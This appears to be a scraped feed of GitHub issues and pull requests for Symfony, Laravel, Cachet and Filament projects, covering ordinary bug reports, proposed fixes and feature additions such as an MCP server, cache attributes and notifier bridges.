10th Aug 2020 @ 14:27

hello mb somedoby can help me? i try to get all subscriptions via subscription API but i always get HTTP/1.1 401 Unauthorized returned for "http://mercure/.well-known/mercure/subscriptions"

my code

$this->httpClient->request('GET', $_ENV['MERCURE_PUBLISH_URL'] . '/subscriptions', [ 'headers' => [ 'Authorization' => 'Bearer ' . $_ENV['MERCURE_JWT_TOKEN'], 'Content-Type' => 'application/ld+json', ] ])->getContent();

Originally posted by @pppupls in https://github.com/symfony/mercure/issues/26#issuecomment-1602402952

View more
2 comments
pppupls

pppupls

28th Jun 2023 @ 13:55

Platform Feature Status: Needs Review
Q A
Bug fix? no
New feature? yes
Docs? no
Issues -
License MIT

This adds a new symfony/ai-higgsfield-platform bridge integrating Higgsfield, an AI creative suite for image and video generation. Because Higgsfield works asynchronously, the client submits a generation request, polls the status endpoint until the media is ready, downloads it and returns it as a BinaryResult (so ->asFile() works as with other media bridges). The model name maps directly to a Higgsfield generation endpoint (e.g. flux-pro/kontext/max/text-to-image, v1/image2video/dop), and an ImageNormalizer maps Image inputs to Higgsfield's image_url shape. The bridge ships with a Factory, ModelCatalog, contract, unit tests, and runnable examples under examples/higgsfield/.

$platform = Factory::createPlatform(apiKey: 'KEY_ID', apiSecret: 'KEY_SECRET');
$result = $platform->invoke(
    'flux-pro/kontext/max/text-to-image',
    new Text('A cat on a kitchen table'),
    [
        'aspect_ratio' => '9:16'
    ],
);
$result->asFile('cat.png');
View more
OskarStark

OskarStark

6th Jul 2026 @ 12:08

The TemplateLinterTest cases assert on verbose output from writeLinterMessage(), which is only printed when the output is verbose (-v). These tests were relying on SHELL_VERBOSITY being inherited from the PHPUnit parent process, but that inheritance is not guaranteed. Pass -v explicitly to runMaker() in all three test cases.

The testControllerInvokability fixture was calling the invokable controller directly without a request in the RequestStack. After a recent update to the Flex base.html.twig recipe that accesses app.request.server, this caused Twig\Error\RuntimeError: Impossible to access an attribute ("server") on a null variable. Push a synthetic Request onto the RequestStack before invoking the controller so app.request is non-null.

View more
GromNaN

GromNaN

13th May 2026 @ 23:20

Hello, Dear Symfony team,

Let me propose a small improvement. When running:

php bin/console make:entity User

the generated entity automatically uses the entity name as the table name (user). However, in real-world projects table naming conventions often differ: pluralized tables (users) prefixed tables (app_user) avoiding reserved SQL keywords (e.g. user in MySQL) At the moment, developers must manually edit the generated entity and add: #[ORM\Table(name: 'users')]

Proposal: Add an optional interactive prompt during make:entity: Table name (default: user): Pressing Enter preserves current behavior: default lowercase entity name is prompted.

Best regards, Vladimir Lasac

CC: @weaverryan @tucksaun @kbond @nyholm

View more
2 comments
volodkaly

volodkaly

8th Dec 2025 @ 06:41

System: Windows 10 Symfony: 6.4 Panther: 2.1.1

I'm creating my client like this: $client = static::createPantherClient([], [ 'webdriver.server_url' => 'http://127.0.0.1:9515', ]); and manually start the chromedriver beforehand with "chromedriver.exe --port=9515", because nothing else worked for me.

Not sure if it is a bug or bad configuration on my side. When i create a chromeclient the process status is checked here: Symfony\Component\Panther\ProcessManager\ChromeManager->start() which calls Symfony\Component\Process->isRunning() This checks against self::STATUS_STARTED which expects 'started', but my chromedriver always returns 'ready'. So it checks the port which is not available, since the chromedriver is using it and it fails with "The port %d is already in use." If i just disable the check, everything seems to be working fine.

The debug information for the process in the start() function looks like this for me

Symfony\Component\Process\Process {#449 -callback: null -commandline: array:2 [ 0 => "./drivers\chromedriver.EXE" 1 => "--port=9515" ] -cwd: "D:\path\to\project" -env: [] -input: null -starttime: null -lastOutputTime: null -timeout: null -idleTimeout: null -exitcode: null -fallbackStatus: [] -processInformation: ? array -outputDisabled: false -stdout: null -stderr: null -process: null -status: "ready" -incrementalOutputOffset: 0 -incrementalErrorOutputOffset: 0 -tty: false -pty: false -options: array:2 [ "suppress_errors" => true "bypass_shell" => true ] -processPipes: ? Symfony\Component\Process\Pipes\WindowsPipes|Symfony\Component\Process\Pipes\UnixPipes -latestSignal: null -cachedExitCode: null }

The commandline path for the driver looks problematic as well.

View more
1 comment
vicotec

vicotec

27th Nov 2024 @ 08:35

I want to get authorization cookie value for my app.localhost domain (public URL of app and mercure hub), but request is sent from server component of Next.js in API Platform, so my current request host is php (same as private URL of mercure hub). as a result I've got an error Unable to create authorization cookie for a hub on the different second-level domain "app.localhost".. maybe it makes sense to compare request host not only with hub public url host, but also with private url?

View more
c1tru55

c1tru55

3rd Jul 2024 @ 20:21

Hello,

I just ran a Composer update and noticed that PR #1403 places the scheduler file beside the kernel file in the root src directory. Shouldn’t it reside in the Scheduler subdirectory?

View more
4 comments 👍 1
chapterjason

chapterjason

25th Apr 2025 @ 20:31

Bug Report

Environment

  • Laravel: 13.19.0
  • PHP: 8.4.16
  • spatie/laravel-pdf: 2.12.0
  • Google Chrome: 147.0.7727.101
  • Driver: browsershot

Description

When calling ->meta() on a PDF generated via the Browsershot driver (Chromium/Puppeteer), the PdfMetadataWriter::parseTrailer() method throws:

RuntimeException: Could not parse PDF trailer to find /Size and /Root.

at vendor/spatie/laravel-pdf/src/PdfMetadataWriter.php:79

Steps to Reproduce

use Spatie\LaravelPdf\Facades\Pdf;

return Pdf::html("<h1>Hello</h1>")
    ->meta(title: "Test", author: "Test")
    ->format("a4")
    ->inline("test.pdf");

This works fine without ->meta(), but throws the exception when metadata is included.

Root Cause

Chromium 147+ generates PDFs using cross-reference streams (PDF 1.5+) instead of traditional xref tables with a separate trailer dictionary. In this format, /Size and /Root are embedded inside the xref stream object dictionary, which can be larger than the 2048-byte chunk that parseTrailer() reads.

In PdfMetadataWriter::parseTrailer():

  1. Strategy 1 reads substr($pdfContent, $startxrefOffset - 512, 2048) — this chunk may not contain the xref stream object at all when the stream is large.
  2. Strategy 2 reads substr($pdfContent, $startxrefOffset, 2048) — the xref stream object dictionary may exceed 2048 bytes (especially with many objects), so /Size or /Root fall outside the window.

Suggested Fix

Increase the chunk sizes and add a fallback that scans the last portion of the PDF:

protected static function parseTrailer(string $pdfContent, int $startxrefOffset): array
{
    // Strategy 1: Traditional trailer dict
    $chunkStart = max(0, $startxrefOffset - 512);
    $chunk = substr($pdfContent, $chunkStart, 4096);

    if (preg_match("/\/Size\s+(\d+)/", $chunk, $sizeMatch)
        && preg_match("/\/Root\s+(\d+\s+\d+\s+R)/", $chunk, $rootMatch)) {
        return [
            "size" => (int) $sizeMatch[1],
            "root" => $rootMatch[1],
        ];
    }

    // Strategy 2: Xref stream object at startxref position (larger window)
    $streamChunk = substr($pdfContent, $startxrefOffset, 4096);

    if (preg_match("/\/Size\s+(\d+)/", $streamChunk, $sizeMatch)
        && preg_match("/\/Root\s+(\d+\s+\d+\s+R)/", $streamChunk, $rootMatch)) {
        return [
            "size" => (int) $sizeMatch[1],
            "root" => $rootMatch[1],
        ];
    }

    // Strategy 3: Scan the tail of the PDF as last resort
    $tail = substr($pdfContent, -8192);

    if (preg_match("/\/Size\s+(\d+)/", $tail, $sizeMatch)
        && preg_match("/\/Root\s+(\d+\s+\d+\s+R)/", $tail, $rootMatch)) {
        return [
            "size" => (int) $sizeMatch[1],
            "root" => $rootMatch[1],
        ];
    }

    throw new RuntimeException("Could not parse PDF trailer to find /Size and /Root.");
}

Additional Context

The issue is reproducible on any HTML content rendered through Chromium. Without ->meta(), PDFs generate and display correctly — the failure is strictly in the post-generation metadata injection step.

View more
ALSABRI87

ALSABRI87

14th Jul 2026 @ 19:00

see symfony/symfony#14560 for the previous discussion

I'm in the process of converting our database from 'utf8' to 'utf8mb4' to support 4-byte unicode chars (emojis for example) and running the conversion queries a problem shows up with the length of some unique keys in the ACL schema which I can't control myself (well, of course I can but then in every migration I make afterwards these will come up and try to revert any ALTER TABLE I make to these tables)

mysql> ALTER TABLE acl_security_identities CONVERT TO CHARACTER SET 'utf8mb4' COLLATE 'utf8mb4_unicode_ci';
ERROR 1709 (HY000): Index column size too large. The maximum column size is 767 bytes.

By default InnoDB can have a maximum index size of 767 bytes. With utf8 encoding, which uses at most 3 bytes per char, you get 255 characters. But in utf8mb4 you now can only index string columns with at most 191 characters. This InnoDB setting can be changed but you have to change all the database and table file formats (see http://mechanics.flite.com/blog/2014/07/29/using-innodb-large-prefix-to-avoid-error-1071/).

So my question would be if the default string lengths of 200 chars that the acl_security_identities and acl_classes unique keys have could be tuned to 191 chars, it's only 9 chars less, I guess it would not be a big problem.

Thanks!

View more
8 comments 👍 5
acasademont

acasademont

5th Oct 2015 @ 10:49

Using the provided Docker image I noticed some issues with the setup that caused huge performance issues.

For the use case where I work at the status page may be hit by 3,000 - 4,000 people at once as a first load for them.

To see how this setup of cachet would handle this I ran a load test of 1,000 users per second for 20 seconds. It buckled under the first 1,000 with the majority ~65% being 500, ~5% being 502 and rest your usual 200.

Ran test on AWS EC2 instance t2.medium, 2 vCPU 4GB RAM and CPUs maxed while RAM was only about 40% usage.

After doing some digging into the dockerfile, compose file, and nginx config I found two significant things.

1.) The cache isn't used at often, at all?

Looking at the nginx setup there seems to be a header that indicates if the request was served a response from the cache.

fastcgi_cache_path /usr/share/nginx/cache/fcgi levels=1:2 keys_zone=microcache:10m max_size=1024m inactive=1h; add_header X-Cache $upstream_cache_status;

I'm not getting this at all and looking at the incoming requests via streaming docker logs gives more evidence the cache isn't being used at all.

2.) *.js files are not being gzipped

vendor.js ~ 542kb all.js ~ 919kb

These two files are sent over the wire uncompressed while the CSS is compressed through gzip. Looking at this through Chrome dev tools. It's about 80% of the total size of the total resources loaded for the page.

To get around these two issues to avoid scaling issues. I've gone ahead and used Chrome headless through puppeteer to run cachet locally, query localhost, scrap the generated html and then upload it to S3 to use in Cloudfront. This happens every minute from a cronjob. This works pretty well as a hack to avoid our status page going down as well.

Wrote this all out to see if I'm missing something? 🤣 Is there a way to serve up a static page for main status page without invoking any PHP without resorting to hack I described above?

Thanks for the project, it simplifies a-lot of other issues that the workaround I implemented above was well worth it!

View more
PaulSearcy

PaulSearcy

1st Oct 2020 @ 02:43

Hi, just stumble recurringly on this while using make:crud.

There are several ways to address that, like using render() or else, but I think the most concensual way of doing so would be to just add createView() to all Controller methods that pass forms to templates.

I might be wrong on that, though, but it's one of the first things I do in those files right after generating them.

View more
1 comment
DocFX

DocFX

4th Jun 2025 @ 11:41

View more
9 comments 👍 4
Grummfy

Grummfy

22nd May 2024 @ 09:32

I am following instructions here https://symfony.com/doc/current/logging/monolog_email.html to email critical errors.

This by itself works just fine.

But when I add a custom log handler, any error that triggers the mailer will cause a second email to be delivered as well. This second email has 2 messages in it:

  1. DEBUG Email transport "Symfony\Component\Mailer\Transport\Smtp\SmtpTransport" stopping
  2. DEBUG Email transport "Symfony\Component\Mailer\Transport\Smtp\SmtpTransport" stopped

The custom log handler is defined at the bottom of my monolog.yaml file like so :

        new_relic_notifier:
            level: critical
            type: service
            id: Shared\Symfony\LogHandler\NewRelicNotifier

It extends from AbstractProcessingHandler. The exact details of the custom error handler are not important. It has nothing to do with the mailer. I could define it with an empty write() method that does nothing. I'm actually using multiple custom log handlers, but the bug occurs if any one of them are registered.

If I remove the custom handler, an error will trigger one email as expected. If one or more custom handlers exist, I get 2 emails.

This only started happening for me since Symfony 5.2.6, previously I was on 5.2.3 and it worked as expected.

View more
15 comments 👍 9
pauljura

pauljura

14th Apr 2021 @ 02:55

Describe the bug Cannot start CachetHQ via docker-compose.

cachet_1  | + checkdbinitmysql
cachet_1  | 
cachet_1  | + table=sessions
cachet_1  | ++ mysql -N -s -h 172.17.0.1 -u cachet -ppassword cachet -P 3306 -e 'select count(*) from information_schema.tables where             table_schema='\''cachet'\'' and table_name='\''chq_sessions'\'';'
cachet_1  | + [[ 0 -eq 1 ]]
cachet_1  | + echo 'Table chq_sessions does not exist! ...'
cachet_1  | + init_db
cachet_1  | + echo 'Initializing Cachet database ...'
cachet_1  | Table chq_sessions does not exist! ...
cachet_1  | Initializing Cachet database ...
cachet_1  | + php artisan cachet:install --no-interaction
cachet_1  | The environment file is invalid: Dotenv values containing spaces must be surrounded by quotes.

Environment

  • Ubuntu server
  • git pull done

Used app version Docker release of Cachet (v.2.4 in docker-compose.yml file)

View more
1 comment
binerf

binerf

22nd Jan 2021 @ 18:24

Is there an existing issue for this?

  • I have searched the existing issues

Expected Behavior

Other Parts of filament will accept an BackedEnum for icon definition. e.g. protected static string|BackedEnum|null $navigationIcon = Heroicon::OutlinedCalendarDays;

Actual Behavior

At the moment this is not possible:

  ->plugins([
      FilamentLogViewer::make()
          ->navigationGroup('System')
          ->navigationIcon(Heroicon::OutlinedDocument) // <---
          ->navigationLabel('Logs')
          ->navigationSort(10)
          ->navigationUrl('/logs'),
  ])

Steps to Reproduce

No response

Log/Stack Trace (if applicable)

No response

Laravel Version

13

Filament Version

5

filament-log-viewer Version

latest

Other Environment Details

no other things to mention here

Visual Representation (Optional)

No response

Anything else?

No response

View more
Schrolli91

Schrolli91

21st May 2026 @ 05:43

Documentation Status: Needs Review Feature TwigComponent
Q A
Bug fix? no
New feature? yes
Deprecations? no
Documentation? yes
Issues #
License MIT

Description

This PR introduces the #[ComponentCache] attribute, which supercharges the existing computed properties system by adding persistent cross-request caching using Symfony Cache.

While the current computed proxy memoizes results during a single request, there was no native way to persistently cache heavy component methods (like complex database queries or API calls) without polluting the component with manual CachePool injections.

With this feature, developers can easily cache the return value of any component method across requests directly from the component class, while keeping the Twig syntax ({{ computed.method }}) exactly the same.

Usage Example

use Symfony\UX\TwigComponent\Attribute\AsTwigComponent;
use Symfony\UX\TwigComponent\Attribute\ComponentCache;

#[AsTwigComponent]
class DashboardStats
{
    // Caches the return value in the 'cache.app' pool for 1 hour.
    #[ComponentCache(expiresAfter: 3600, tags: ['dashboard_stats'])]
    public function getHeavyMetrics(): array
    {
        return $this->repository->calculateComplexMetrics();
    }
}

In the template, it is accessed seamlessly via the existing proxy:

{# The first visitor triggers the DB query. For the next hour, it's served from the persistent cache in 0ms. #}
Total Users: {{ computed.heavyMetrics.totalUsers }}

Key Features

  • Auto-Key Generation: If no key is provided, a unique cache key is automatically generated using the component's class name, method name, and a hash of its public properties (get_object_vars()). This ensures the cache invalidates safely when LiveComponent props (e.g., page, filters) change!
  • Dynamic Pool Support: Supports injecting specific cache pools (e.g. pool: 'cache.redis'). Falls back to cache.app by default.
  • Tags & Expiration: Supports tags (for TagAware adapters) and expiresAfter (seconds or DateInterval).
  • LiveComponent Compatible: Works flawlessly inside LiveComponents since it hooks directly into ComputedPropertiesProxy.
View more
xDeSwa

xDeSwa

8th Jun 2026 @ 15:59

Priority: P3 (Medium - Plan to Fix)

Problem

UserLevelEnum (src/Enums/UserLevelEnum.php) defines admin = 1 and user = 2, but the User model uses a boolean is_admin column instead. No code references this enum outside its own file.

Suggested Fix

Delete UserLevelEnum.php. The boolean is_admin approach is simpler and already works.

View more
jbrooksuk

jbrooksuk

9th Mar 2026 @ 11:42

Bug FrameworkBundle Status: Needs Review
Q A
Branch? 8.1
Bug fix? yes
New feature? no
Deprecations? no
Issues -
License MIT

Since #52265, configuring framework.http_client.mock_response_factory no longer decorates the client transport. Instead it registers a standalone .http_client.mock_transport.<factory> MockHttpClient service and repoints http_client's transport argument to it.

As a side effect, any service decorating http_client.transport is silently dropped from the chain once a mock factory is configured — which is a behavior regression, not something #52265 intended to change:

  • Before #52265 the mock was registered as a decorator of http_client.transport (priority -10). Decorators registered by users/bundles at a lower priority (e.g. -11) stayed in the chain and wrapped the mock.
  • After #52265 http_client points at a brand-new transport service, so those decorators — still attached to http_client.transport — are never invoked.

Decorating http_client.transport is how bundles add cross-cutting behavior to every outgoing request (dispatching an event per request, logging, metrics, tracing, …). Such a decorator keeps working in production but stops being invoked as soon as tests configure mock_response_factory. The failure mode is silent — no error, no deprecation — so a test asserting e.g. "an event was dispatched for this request" simply starts seeing zero, which is hard to trace back to the container wiring.

Reproducer

// A decorator on the transport, e.g. dispatching an event per request
$container->register(MyTransportDecorator::class)
    ->setDecoratedService('http_client.transport', null, -11)
    ->setAutowired(true);

// test config
$framework->httpClient()->mockResponseFactory(MyMockResponseFactory::class);

Before #52265 the request flows through MyTransportDecorator → mock. After #52265 MyTransportDecorator is bypassed.

Fix

Register the mock as a decorator of http_client.transport in place (priority -10, as before #52265) instead of creating a separate service and repointing http_client. This restores the pre-#52265 chain while keeping the per-scoped-client factories introduced by #52265 (scopes with a distinct factory keep their dedicated transport service).

A regression test (testHttpClientMockResponseFactoryKeepsTransportDecoratable) asserts that http_client keeps referencing http_client.transport and that the mock is wired as a decorator of it, so this cannot silently regress again.

View more
alexndlm

alexndlm

10th Jul 2026 @ 14:57

Similar to make:listener, this maker helps create Doctrine event or entity listeners.

View more
HypeMC

HypeMC

18th May 2025 @ 20:20

View more
4 comments
Fan2Shrek

Fan2Shrek

27th Feb 2025 @ 07:46

Summary

Adds a first-party MCP server built on laravel/mcp, so AI agents can operate a Cachet status page over the Model Context Protocol with the same capabilities the dashboard exposes — gated by admin settings and authenticated with the existing API token feature.

What changed

Endpoint & settings

  • Streamable-HTTP MCP endpoint at {cachet.path}/mcp (default /status/mcp), registered alongside the API routes with its own cachet:mcp middleware group (cachet.mcp_middleware) and throttle:cachet-mcp limiter (CACHET_MCP_RATE_LIMIT, default 300/min).
  • Two new admin settings mirroring the API pair, editable from Manage Cachet: Enable MCP server (mcp_enabled, default off → all MCP requests 404) and Require authentication (mcp_protected, default on → 401 without a Sanctum token). New EnsureMcpIsEnabled / AuthenticateMcpIfProtected middleware mirror their API counterparts.
  • The demo seeder enables MCP with authentication off, so demo instances expose the public read tools out of the box.

Tools (41, one per operation)

  • Cover the ten API-token resources: components, component groups, incidents, incident updates, incident templates, schedules, schedule updates, metrics, metric points, and subscribers — including the dashboard's special verbs (record_incident_update auto-resolves on fixed, record_schedule_update completes via completed_at, add_metric_point, subscriber verification on create).
  • Write tools call the same Cachet\Actions\** classes and request Data objects as the dashboard and REST API, so validation, webhooks, and subscriber notifications fire identically.
  • Auth mirrors the REST API: write tools require a token with the matching existing ability (incidents.manage, components.delete, …), enforced via shouldRegister() — which gates both tools/list and tools/call — plus an in-handle check. Dashboard-issued API keys work unchanged. Subscriber reads stay ability-guarded (PII).
  • Read tools apply the GHSA-6ghm-wf22-pvx5 visibility scoping from #367: incidents/metrics/component groups are scoped with visible(), components inherit their group's visibility (ungrouped stay public), and disabled components are hidden from guests by default.

Composer

  • laravel/mcp moves from require-dev to require at ^0.8; the Laravel 11 floor rises to ^11.45.3 across the illuminate dependencies (laravel/mcp's own minimum).

Verification

  • Full suite green (840 tests), PHPStan and Pint clean.
  • New coverage: HTTP-level gating (404/401/initialize/tools/list visibility per token ability, tools/call blocked for unregistered tools), per-resource tool tests, and visibility regression tests mirroring #367's.
  • Live smoke test over the streamable HTTP transport: create/resolve incidents with a scoped token, ability denial, guest read access with demo defaults, and no leakage of hidden/authenticated-only records to guests.

🤖 Generated with Claude Code

https://claude.ai/code/session_0157S7dDNDwYuqWsqeg1DB94

View more
jbrooksuk

jbrooksuk

14th Jul 2026 @ 07:44

Feature Status: Needs Review Notifier
Q A
Branch? 8.2
Bug fix? no
New feature? yes
BC breaks? no
Deprecations? no
Issues none
License MIT

Summary

Adds a Chatter transport bridge for Meta's WhatsApp Cloud API (Symfony\Component\Notifier\Bridge\MetaWhatsApp), following the same shape as the existing bridges (e.g. GatewayApi, Vonage): MetaWhatsAppTransport + MetaWhatsAppTransportFactory + MetaWhatsAppOptions + DSN scheme (metawhatsapp://) + tests + README, wired into notifier_transports.php as chatter.transport_factory under the meta-whatsapp key.

There is currently no official or community Notifier bridge that talks to Meta's Graph API POST /{phone_number_id}/messages endpoint directly (existing WhatsApp-adjacent bridges — Termii, GatewayApi, Twilio — go through their own gateway APIs, not Meta's Cloud API). This bridge fills that gap.

What it supports

  • Sending a pre-approved template message (MetaWhatsAppOptions::template()), required by Meta for business-initiated messages outside the 24h customer-service window.
  • Sending free-form text inside that window (no options / no template set).
  • Per-message recipient targeting via MetaWhatsAppOptions::recipientPhoneNumber(), matching the getRecipientId()-based pattern other per-conversation Chatter bridges (e.g. Telegram) use, since WhatsApp has no fixed channel/room to post to.

Not in scope here

Quick-reply buttons are configured on the template itself in Meta's WhatsApp Manager, not passed in the API call — so there's no button-related code in the transport. Delivery/read status webhooks are also out of scope for this bridge (inbound webhook handling is application-level, not a Notifier transport concern).

Tests

vendor/bin/phpunit passes locally (24 tests, 36 assertions) against the actual symfony/notifier component from this branch (via a local path repository), not just an isolated copy.

Context

I built this bridge for an application that needed to send WhatsApp appointment reminders/confirmations through Meta's Cloud API and wanted a proper Notifier transport rather than a one-off HTTP client call, so it's upstreamable and reusable rather than living only in app code.

I'm aware Symfony is selective about accepting brand-new provider bridges — happy to iterate on naming/shape/scope based on maintainer feedback, or to keep this as a standalone package if a bridge PR isn't the right fit here.

View more
5 comments
recchia

recchia

13th Jul 2026 @ 05:06

When creating a new Symfony Web application, I think it could now make sense to:

  • install UX TwigComponent, I think it's something that everyone uses in their Symfony applications, whether legacy or new - it has more than twice UX Turbo installs (already shipped by default since a long time ago)
  • install UX Toolkit, which offers ready-to-use Twig components
View more
👍 1 🚀 1
Kocal

Kocal

12th Feb 2026 @ 08:27

Store Feature Status: Needs Review BC Break
Q A
Bug fix? no
New feature? yes
Docs? yes
Issues -
License MIT

Adds StoreInterface::clear() to remove all documents from a store while keeping the underlying table, index or collection intact - in contrast to ManagedStoreInterface::drop(), which removes the infrastructure itself.

$store->clear();      // documents gone, index still there - re-index without setup()
$store->drop();       // infrastructure gone

clear() follows the PHP/Symfony idiom (PSR-6 CacheItemPoolInterface::clear(), Doctrine Collection::clear()) and is vendor-neutral, unlike truncate (SQL-table vocabulary, SQLite has no such keyword) or purge (means reclaiming already-deleted rows in InnoDB/Solr).

  • Implemented in all 25 stores with the native mechanism of each backend: TRUNCATE TABLE (Postgres, MariaDB, ClickHouse, Manticore), _delete_by_query (Elasticsearch, OpenSearch), deleteMany({}) (MongoDB), label-scoped DETACH DELETE (Neo4j), match-all filters (Qdrant, Weaviate, Typesense), deleteAll (Pinecone), SCAN + DEL (Redis), ...
  • AzureSearch and S3Vectors have no delete-all API and enumerate-then-delete in batches. Cloudflare Vectorize supports neither listing nor bulk delete, so it recreates the index - documented.
  • Adds ai:store:clear command next to ai:store:setup and ai:store:drop.

Verified with the docker compose runtimes and the store integration tests, which now cover clear() and that the store stays usable afterwards.

Two bugs surfaced while doing so:

  • testRemoveDocuments depended on the optional text/hybrid query tests, and PHPUnit skips dependents of a skipped test - so remove() and drop() were never actually run for stores without TextQuery support. The optional query tests now pass through instead of skipping.
  • That uncovered a broken remove() in the Manticore Search store: uuid was created as a TEXT field, but documents are removed by an equals filter, which Manticore rejects on stored text fields ("unsupported column 'uuid' (stored field, NOT attribute)"). It is now a STRING attribute - existing tables need to be recreated, see UPGRADE.md.
View more
chr-hertel

chr-hertel

12th Jul 2026 @ 16:23

enhancement

Note: We are not looking for a community member to build this feature, it will be handled a member of the Filament core team when we have availability.

View more
1 comment 👍 17 ❤️ 3
danharrin

danharrin

31st Jan 2025 @ 09:50

Fixes #647.

PropertyRules::add() currently deduplicates all RequiringRule implementations as a group. That means adding RequiredWith after RequiredUnless, or adding more than one RequiredWith, drops the earlier conditional required rules even though Laravel supports combining them.

This changes add/prepend deduplication so conditional requiring rules can accumulate, while generated/plain Required is still removed when an explicit conditional requiring rule is added. Explicit removeType(RequiringRule::class) still clears all requiring rules.

Tests:

  • php -l src\Support\Validation\PropertyRules.php
  • php -l tests\Support\Validation\PropertyRulesTest.php
  • php -l tests\ValidationTest.php
  • php vendor\bin\pest tests\Support\Validation\PropertyRulesTest.php --no-coverage
  • php vendor\bin\pest tests\ValidationTest.php --filter "multiple required rules" --no-coverage
  • php vendor\bin\php-cs-fixer fix --dry-run --diff --allow-risky=yes --config=.php-cs-fixer.dist.php src\Support\Validation\PropertyRules.php tests\Support\Validation\PropertyRulesTest.php tests\ValidationTest.php
  • php vendor\bin\phpstan analyse src\Support\Validation\PropertyRules.php --memory-limit=1G

Local note: the full tests\ValidationTest.php file gets past the new regression, but one unrelated existing test fails on this Windows/PHP setup with phpDocumentor rejecting an anonymous-class FQSEN path.

View more
1 comment
ibobgunardi

ibobgunardi

2nd Jun 2026 @ 23:53

I have a docker for my Symfony 5 project, but I can't make it work with @symfony/ux-swup. When I try to build with npm run build, I have the error bellow in Docker :

Step #0:  error  in ./assets/controllers.json
Step #0: Syntax Error: Error: The file "@symfony/ux-swup/package.json" could not be found. Try running "yarn install --force".

Here is my docker file relevant parts :

FROM composer:1.9 as build
WORKDIR /app/
COPY composer.json composer.lock /app/
RUN composer global require hirak/prestissimo && \
    composer install

# ------------------------------------------------------

FROM php:7.4.5-apache
RUN apt-get update && apt-get install -y 

COPY --from=build /app/vendor /var/www/app/vendor

WORKDIR /var/www/app
COPY . /var/www/app/

# ------------------------------------------------------

FROM node:12-alpine
WORKDIR /var/www/app

COPY package*.json webpack.config.js /var/www/app/
COPY assets /var/www/app/assets

RUN npm install && \
    npm run build

I have noticed that in the package.js, ux-swup il referenced by :

"@symfony/ux-swup": "file:vendor/symfony/ux-swup/Resources/assets",

Not sure if this might cause the problem...

Any clues? Thanks!

View more
3 comments
adrienlamotte

adrienlamotte

25th Mar 2021 @ 00:20

dependencies

Bumps actions/checkout from 4 to 7.

Dependabot compatibility score

Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.


You can trigger Dependabot actions by commenting on this PR:

  • @dependabot rebase will rebase this PR
  • @dependabot recreate will recreate this PR, overwriting any edits that have been made to it
  • @dependabot show <dependency name> ignore conditions will show all of the ignore conditions of the specified dependency
  • @dependabot ignore this major version will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)
  • @dependabot ignore this minor version will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)
  • @dependabot ignore this dependency will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)
View more
dependabot[bot]

dependabot[bot]

1st Jul 2026 @ 08:02

HttpKernel Status: Needs Review
View more
MatTheCat

MatTheCat

13th Jul 2026 @ 13:57

Is possible to replace the default AclVoter (Symfony\Component\Security\Acl\Voter\AclVoter)?

Otherwise is possible to disable default AclVoter?

Thanks

View more
1 comment
davidedonattini

davidedonattini

30th Sep 2016 @ 12:37

This bothered me as it was the only method still stubbed.

The PR ensures creationTimeOfOldestPendingJob works on the fake, we now also ensure all the InspectedJob classes have a createdAt set, which is what would happen on the real drivers, which is very useful for tests etc.

This now means, all the queue metrics/inspection methods are covered by the fake 🥳 🥳 🥳 🥳 🥳

View more
1 comment
jackbayliss

jackbayliss

10th Jul 2026 @ 14:22

Stalled

When running yarn build the build fails for using require instead of ESM in what seems a Webpack Encore dependency;

[webpack-cli] Error [ERR_REQUIRE_ESM]: require() of ES Module /var/www/app/node_modules/strip-ansi/index.js from /var/www/app/node_modules/renderkid/lib/RenderKid.js not supported.
Instead change the require of index.js in /var/www/app/node_modules/renderkid/lib/RenderKid.js to a dynamic import() which is available in all CommonJS modules.
    at Object.<anonymous> (/var/www/app/node_modules/renderkid/lib/RenderKid.js:22:13)
    at Object.<anonymous> (/var/www/app/node_modules/pretty-error/lib/PrettyError.js:14:13)
    at Object.<anonymous> (/var/www/app/node_modules/@symfony/webpack-encore/lib/utils/pretty-error.js:12:21)
    at Object.<anonymous> (/var/www/app/node_modules/@symfony/webpack-encore/lib/EncoreProxy.js:14:21)
    at Object.<anonymous> (/var/www/app/node_modules/@symfony/webpack-encore/index.js:13:21)
    at Object.<anonymous> (/var/www/app/webpack.config.js:2:16) {
  code: 'ERR_REQUIRE_ESM'
}

Yarn version; yarn run v1.22.21 Webpack encore version; 4.6.1

View more
13 comments 👍 4
Martin1982

Martin1982

2nd Apr 2024 @ 08:44

help wanted

Hi 👋🏼!

I am coming here to gather some feedback on my idea before starting working on it.

Background

I wanted to create a POC of https://github.com/symfony/skeleton made for Sylius. I created a simple recipe for sylius/core-bundle, then an example skeleton repo and I have found out my recipes does not work as another recipe already write files with the same name. Then, I noticed symfony/framework-bundle is always put as the first recipe to be executed, and this is a thing I wish to be able to configure.

Goal

Somehow allow myself to make (in this POC case) sylius/core-bundle as a first recipe to be executed. Of course, I can fork symfony/flex, but it would be perfect to avoid this way.

Idea

The idea is simple, we allow configuring such list for example in this way:

{
    ...
    "extra": {
        "flex": {
            "prioritized-recipes": [
                "sylius/core-bundle",
                "another/sylius-package",
                ...
            ]
        }
    }
    ...
}

In Flex we could implement this +/- this way:

        // symfony/framework-bundle recipe should always be applied first after the metapackages
        // however, we allow to override it with a list of prioritized recipes
        $recipes = $this->getPrioritizedRecipes();
        $recipes = array_merge($recipes, [
            'symfony/framework-bundle' => null,
        ]);
        $packRecipes = [];
        $metaRecipes = [];

instead current

        // symfony/framework-bundle recipe should always be applied first after the metapackages
        $recipes = [
            'symfony/framework-bundle' => null,
        ];
        $packRecipes = [];
        $metaRecipes = [];

Why?

  • In some projects, we may want to load our recipes before the Symfony's ones
  • In frameworks based on Symfony (like Sylius) we need to set up the whole project in our own way, so framework-bundle as a first recipe to be executed makes it unable for us

Other options

I have not checked it yet, but I believe we can achieve the similar feature using Composer's Event Dispatcher. But first, I would like to hear if such a feature is welcomed. Or maybe you have a better idea how to solve this. I am open to provide such feature right after we agree on some solution.

View more
6 comments ❤️ 1
jakubtobiasz

jakubtobiasz

7th Nov 2022 @ 19:24

Laravel Version

13.5.0

PHP Version

8.5

Database Driver & Version

No response

Description

Changes to ShouldBeUniqueUntilProcessing in #59567 are causing what appears to be lost jobs in 13.5.0.

Scenario

I have a production Laravel application that uses jobs heavily. It's been working properly for >1 year, through many framework upgrades, but started failing after upgrading to 13.5.0 with what appears to be lost jobs.

